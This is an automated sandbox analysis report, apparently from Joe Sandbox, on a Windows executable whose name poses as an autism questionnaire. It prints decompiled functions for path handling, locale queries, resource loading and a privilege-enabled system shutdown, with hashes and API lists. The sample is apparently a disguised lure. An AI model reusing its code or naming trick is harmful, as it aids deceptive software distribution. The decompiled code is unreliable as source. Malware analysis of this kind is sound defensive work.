                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Free$Query
                                                                                              • String ID:
                                                                                              • API String ID: 778034434-0
                                                                                              • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                              • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                                                              • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                              • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              C-Code - Quality: 78%
                                                                                              			E0040A928(short* __eax, intOrPtr __edx) {
                                                                                              				short* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				void* _v20;
                                                                                              				struct _WIN32_FIND_DATAW _v612;
                                                                                              				short _v1134;
                                                                                              				signed int _t50;
                                                                                              				signed int _t51;
                                                                                              				void* _t55;
                                                                                              				signed int _t88;
                                                                                              				signed int _t89;
                                                                                              				intOrPtr* _t90;
                                                                                              				signed int _t101;
                                                                                              				signed int _t102;
                                                                                              				short* _t112;
                                                                                              				struct HINSTANCE__* _t113;
                                                                                              				short* _t115;
                                                                                              				short* _t116;
                                                                                              				void* _t117;
                                                                                              
                                                                                              				_v12 = __edx;
                                                                                              				_v8 = __eax;
                                                                                              				_v16 = _v8;
                                                                                              				_t113 = GetModuleHandleW(L"kernel32.dll");
                                                                                              				if(_t113 == 0) {
                                                                                              					L4:
                                                                                              					if( *_v8 != 0x5c) {
                                                                                              						_t115 = _v8 + 4;
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						if( *((short*)(_v8 + 2)) == 0x5c) {
                                                                                              							_t116 = E0040A904(_v8 + 4);
                                                                                              							if( *_t116 != 0) {
                                                                                              								_t14 = _t116 + 2; // 0x2
                                                                                              								_t115 = E0040A904(_t14);
                                                                                              								if( *_t115 != 0) {
                                                                                              									L10:
                                                                                              									_t88 = _t115 - _v8;
                                                                                              									_t89 = _t88 >> 1;
                                                                                              									if(_t88 < 0) {
                                                                                              										asm("adc ebx, 0x0");
                                                                                              									}
                                                                                              									_t43 = _t89 + 1;
                                                                                              									if(_t89 + 1 <= 0x105) {
                                                                                              										E0040A34C( &_v1134, _v8, _t43);
                                                                                              										while( *_t115 != 0) {
                                                                                              											_t112 = E0040A904(_t115 + 2);
                                                                                              											_t50 = _t112 - _t115;
                                                                                              											_t51 = _t50 >> 1;
                                                                                              											if(_t50 < 0) {
                                                                                              												asm("adc eax, 0x0");
                                                                                              											}
                                                                                              											if(_t51 + _t89 + 1 <= 0x105) {
                                                                                              												_t55 =  &_v1134 + _t89 + _t89;
                                                                                              												_t101 = _t112 - _t115;
                                                                                              												_t102 = _t101 >> 1;
                                                                                              												if(_t101 < 0) {
                                                                                              													asm("adc edx, 0x0");
                                                                                              												}
                                                                                              												E0040A34C(_t55, _t115, _t102 + 1);
                                                                                              												_v20 = FindFirstFileW( &_v1134,  &_v612);
                                                                                              												if(_v20 != 0xffffffff) {
                                                                                              													FindClose(_v20);
                                                                                              													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
                                                                                              														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
                                                                                              														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
                                                                                              														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
                                                                                              														_t115 = _t112;
                                                                                              														continue;
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              											goto L24;
                                                                                              										}
                                                                                              										E0040A34C(_v8,  &_v1134, _v12);
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
                                                                                              					if(_t90 == 0) {
                                                                                              						goto L4;
                                                                                              					} else {
                                                                                              						_push(0x105);
                                                                                              						_push( &_v1134);
                                                                                              						_push(_v8);
                                                                                              						if( *_t90() == 0) {
                                                                                              							goto L4;
                                                                                              						} else {
                                                                                              							E0040A34C(_v8,  &_v1134, _v12);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L24:
                                                                                              				return _v16;
                                                                                              			}






















                                                                                              0x0040aac1
                                                                                              0x0040aa84
                                                                                              0x0040aa62
                                                                                              0x00000000
                                                                                              0x0040aa23
                                                                                              0x0040aad9
                                                                                              0x0040aad9
                                                                                              0x0040a9eb
                                                                                              0x0040a9c9
                                                                                              0x0040a9b5
                                                                                              0x0040a99e
                                                                                              0x0040a950
                                                                                              0x0040a95b
                                                                                              0x0040a95f
                                                                                              0x00000000
                                                                                              0x0040a961
                                                                                              0x0040a961
                                                                                              0x0040a96c
                                                                                              0x0040a970
                                                                                              0x0040a975
                                                                                              0x00000000
                                                                                              0x0040a977
                                                                                              0x0040a983
                                                                                              0x0040a983
                                                                                              0x0040a975
                                                                                              0x0040a95f
                                                                                              0x0040aade
                                                                                              0x0040aae7

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                                                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                                                              • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                              • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                              • API String ID: 1930782624-3908791685
                                                                                              • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                              • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                                                              • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                              • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E004AF110() {
                                                                                              				int _v4;
                                                                                              				struct _TOKEN_PRIVILEGES _v16;
                                                                                              				void* _v20;
                                                                                              				int _t7;
                                                                                              
                                                                                              				if(E0041FF2C() != 2) {
                                                                                              					L5:
                                                                                              					_t7 = ExitWindowsEx(2, 0);
                                                                                              					asm("sbb eax, eax");
                                                                                              					return _t7 + 1;
                                                                                              				}
                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
                                                                                              					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
                                                                                              					_v16.PrivilegeCount = 1;
                                                                                              					_v4 = 2;
                                                                                              					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
                                                                                              					if(GetLastError() == 0) {
                                                                                              						goto L5;
                                                                                              					}
                                                                                              					return 0;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}








                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                              • String ID: SeShutdownPrivilege
                                                                                              • API String ID: 107509674-3733053543
                                                                                              • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                              • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                                                              • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                              • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004AF9F0() {
                                                                                              				struct HRSRC__* _t10;
                                                                                              				void* _t11;
                                                                                              				void* _t12;
                                                                                              
                                                                                              				_t10 = FindResourceW(0, 0x2b67, 0xa);
                                                                                              				if(_t10 == 0) {
                                                                                              					E004AF834();
                                                                                              				}
                                                                                              				if(SizeofResource(0, _t10) != 0x2c) {
                                                                                              					E004AF834();
                                                                                              				}
                                                                                              				_t11 = LoadResource(0, _t10);
                                                                                              				if(_t11 == 0) {
                                                                                              					E004AF834();
                                                                                              				}
                                                                                              				_t12 = LockResource(_t11);
                                                                                              				if(_t12 == 0) {
                                                                                              					E004AF834();
                                                                                              				}
                                                                                              				return _t12;
                                                                                              			}







                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                                                              • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                                                              • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                              • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                                                              • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                              • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 71%
                                                                                              			E0040A4CC(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                              				intOrPtr* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				short _v182;
                                                                                              				short _v352;
                                                                                              				char _v356;
                                                                                              				char _v360;
                                                                                              				char _v364;
                                                                                              				int _t58;
                                                                                              				signed int _t61;
                                                                                              				intOrPtr _t70;
                                                                                              				signed short _t80;
                                                                                              				void* _t83;
                                                                                              				void* _t85;
                                                                                              				void* _t86;
                                                                                              
                                                                                              				_t77 = __edi;
                                                                                              				_push(__edi);
                                                                                              				_v356 = 0;
                                                                                              				_v360 = 0;
                                                                                              				_v364 = 0;
                                                                                              				_v8 = __edx;
                                                                                              				_t80 = __eax;
                                                                                              				_push(_t83);
                                                                                              				_push(0x40a631);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t83 + 0xfffffe98;
                                                                                              				E00407A20(_v8);
                                                                                              				_t85 = _t80 -  *0x4b7a08; // 0x404
                                                                                              				if(_t85 >= 0) {
                                                                                              					_t86 = _t80 -  *0x4b7c08; // 0x7c68
                                                                                              					if(_t86 <= 0) {
                                                                                              						_t77 = 0x40;
                                                                                              						_v12 = 0;
                                                                                              						if(0x40 >= _v12) {
                                                                                              							do {
                                                                                              								_t61 = _t77 + _v12 >> 1;
                                                                                              								if(_t80 >=  *((intOrPtr*)(0x4b7a08 + _t61 * 8))) {
                                                                                              									__eflags = _t80 -  *((intOrPtr*)(0x4b7a08 + _t61 * 8));
                                                                                              									if(__eflags <= 0) {
                                                                                              										E0040A3EC( *((intOrPtr*)(0x4b7a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
                                                                                              									} else {
                                                                                              										_v12 = _t61 + 1;
                                                                                              										goto L8;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_t77 = _t61 - 1;
                                                                                              									goto L8;
                                                                                              								}
                                                                                              								goto L9;
                                                                                              								L8:
                                                                                              							} while (_t77 >= _v12);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L9:
                                                                                              				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
                                                                                              					_t58 = _t80 & 0x0000ffff;
                                                                                              					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
                                                                                              					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
                                                                                              					E0040858C( &_v356, 0x55,  &_v182);
                                                                                              					_push(_v356);
                                                                                              					_push(0x40a64c);
                                                                                              					E0040858C( &_v360, 0x55,  &_v352);
                                                                                              					_push(_v360);
                                                                                              					_push(E0040A65C);
                                                                                              					E0040858C( &_v364, 0x55,  &_v182);
                                                                                              					_push(_v364);
                                                                                              					E004087C4(_v8, _t58, 5, _t77, _t80);
                                                                                              				}
                                                                                              				_pop(_t70);
                                                                                              				 *[fs:eax] = _t70;
                                                                                              				_push(E0040A638);
                                                                                              				return E00407A80( &_v364, 3);
                                                                                              			}


















                                                                                              APIs
                                                                                              • IsValidLocale.KERNEL32(?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A576
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A592
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A5A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$Info$Valid
                                                                                              • String ID:
                                                                                              • API String ID: 1826331170-0
                                                                                              • Opcode ID: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                                              • Instruction ID: 92a11a0233c3b219485afac9e49f2dea99407596d6f7a83949ef3a6145fdf69e
                                                                                              • Opcode Fuzzy Hash: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                                              • Instruction Fuzzy Hash: 3831AE70A00308ABDF20DB64DD81BDEBBB9FB48701F5005BBA508B32D1D6395E90CE1A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                              				long _v8;
                                                                                              				long _v12;
                                                                                              				long _v16;
                                                                                              				long _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				signed int _v28;
                                                                                              				WCHAR* _t25;
                                                                                              				int _t26;
                                                                                              				intOrPtr _t31;
                                                                                              				intOrPtr _t34;
                                                                                              				intOrPtr* _t37;
                                                                                              				intOrPtr* _t38;
                                                                                              				intOrPtr _t46;
                                                                                              				intOrPtr _t48;
                                                                                              
                                                                                              				_t25 = _a4;
                                                                                              				if(_t25 == 0) {
                                                                                              					_t25 = 0;
                                                                                              				}
                                                                                              				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                                              				_v28 = _v8 * _v12;
                                                                                              				_v24 = 0;
                                                                                              				_t46 = _v24;
                                                                                              				_t31 = E004095A8(_v28, _t46, _v16, 0);
                                                                                              				_t37 = _a8;
                                                                                              				 *_t37 = _t31;
                                                                                              				 *((intOrPtr*)(_t37 + 4)) = _t46;
                                                                                              				_t48 = _v24;
                                                                                              				_t34 = E004095A8(_v28, _t48, _v20, 0);
                                                                                              				_t38 = _a12;
                                                                                              				 *_t38 = _t34;
                                                                                              				 *((intOrPtr*)(_t38 + 4)) = _t48;
                                                                                              				return _t26;
                                                                                              			}


















                                                                                              APIs
                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DiskFreeSpace
                                                                                              • String ID:
                                                                                              • API String ID: 1705453755-0
                                                                                              • Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                              • Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
                                                                                              • Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                              • Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E034(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                                              				short _v516;
                                                                                              				void* __ebp;
                                                                                              				int _t5;
                                                                                              				intOrPtr _t10;
                                                                                              				void* _t18;
                                                                                              
                                                                                              				_t18 = __ecx;
                                                                                              				_t10 = _a4;
                                                                                              				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
                                                                                              				_t19 = _t5;
                                                                                              				if(_t5 <= 0) {
                                                                                              					return E00407E00(_t10, _t18);
                                                                                              				}
                                                                                              				return E00407BA8(_t10, _t5 - 1,  &_v516, _t19);
                                                                                              			}









                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                                              • Instruction ID: c90943d4e22265a1f7ecf9aede9ac9faa011377f579ac525cbc4109061889d1c
                                                                                              • Opcode Fuzzy Hash: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                                              • Instruction Fuzzy Hash: C7E09235B0421427E314A55A9C86AE7725D9B48340F40457FBD05D7382EDB9AE8042E9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 79%
                                                                                              			E0041E080(int __eax, signed int __ecx, int __edx) {
                                                                                              				short _v16;
                                                                                              				signed int _t5;
                                                                                              				signed int _t10;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t10 = __ecx;
                                                                                              				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
                                                                                              					_t5 = _t10;
                                                                                              				} else {
                                                                                              					_t5 = _v16 & 0x0000ffff;
                                                                                              				}
                                                                                              				return _t5;
                                                                                              			}







                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004AF218(signed int __eax) {
                                                                                              				short _v8;
                                                                                              				signed int _t6;
                                                                                              
                                                                                              				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
                                                                                              				if(_t6 <= 0) {
                                                                                              					return _t6 | 0xffffffff;
                                                                                              				}
                                                                                              				return _v8;
                                                                                              			}






                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,004AF318), ref: 004AF22E
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0041C3D8() {
                                                                                              				struct _SYSTEMTIME* _t2;
                                                                                              
                                                                                              				GetLocalTime(_t2);
                                                                                              				return _t2->wYear & 0x0000ffff;
                                                                                              			}





                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 481472006-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004255DC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                              				intOrPtr* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				signed int _v24;
                                                                                              				char _v25;
                                                                                              				signed int _v32;
                                                                                              				signed int _v36;
                                                                                              				signed int _v40;
                                                                                              				signed int _v44;
                                                                                              				signed int _v48;
                                                                                              				signed int _v52;
                                                                                              				signed int _v56;
                                                                                              				intOrPtr _v60;
                                                                                              				char _v64;
                                                                                              				char* _v68;
                                                                                              				void* _v72;
                                                                                              				char _v76;
                                                                                              				intOrPtr _v80;
                                                                                              				intOrPtr _v84;
                                                                                              				signed int _v88;
                                                                                              				char _v89;
                                                                                              				char _v96;
                                                                                              				signed int _v100;
                                                                                              				signed int _v104;
                                                                                              				short* _v108;
                                                                                              				signed int _v112;
                                                                                              				signed int _v116;
                                                                                              				intOrPtr _v120;
                                                                                              				intOrPtr _v124;
                                                                                              				intOrPtr _v128;
                                                                                              				intOrPtr _v132;
                                                                                              				char _v136;
                                                                                              				signed int _t370;
                                                                                              				void* _t375;
                                                                                              				signed int _t377;
                                                                                              				signed int _t381;
                                                                                              				signed int _t389;
                                                                                              				signed int _t395;
                                                                                              				signed int _t411;
                                                                                              				intOrPtr _t422;
                                                                                              				signed int _t426;
                                                                                              				signed int _t435;
                                                                                              				void* _t448;
                                                                                              				signed int _t458;
                                                                                              				char _t460;
                                                                                              				signed int _t474;
                                                                                              				char* _t503;
                                                                                              				signed int _t508;
                                                                                              				signed int _t616;
                                                                                              				signed int _t617;
                                                                                              				signed int _t618;
                                                                                              				signed int _t622;
                                                                                              
                                                                                              				_v16 = __ecx;
                                                                                              				_v12 = __edx;
                                                                                              				_v8 = __eax;
                                                                                              				_v20 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                              				_v24 = 0;
                                                                                              				_v32 = (1 <<  *(_v8 + 8)) - 1;
                                                                                              				_v36 = (1 <<  *(_v8 + 4)) - 1;
                                                                                              				_v40 =  *_v8;
                                                                                              				_t617 =  *((intOrPtr*)(_v8 + 0x34));
                                                                                              				_t474 =  *(_v8 + 0x44);
                                                                                              				_v44 =  *((intOrPtr*)(_v8 + 0x38));
                                                                                              				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
                                                                                              				_v52 =  *((intOrPtr*)(_v8 + 0x40));
                                                                                              				_v56 =  *((intOrPtr*)(_v8 + 0x48));
                                                                                              				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
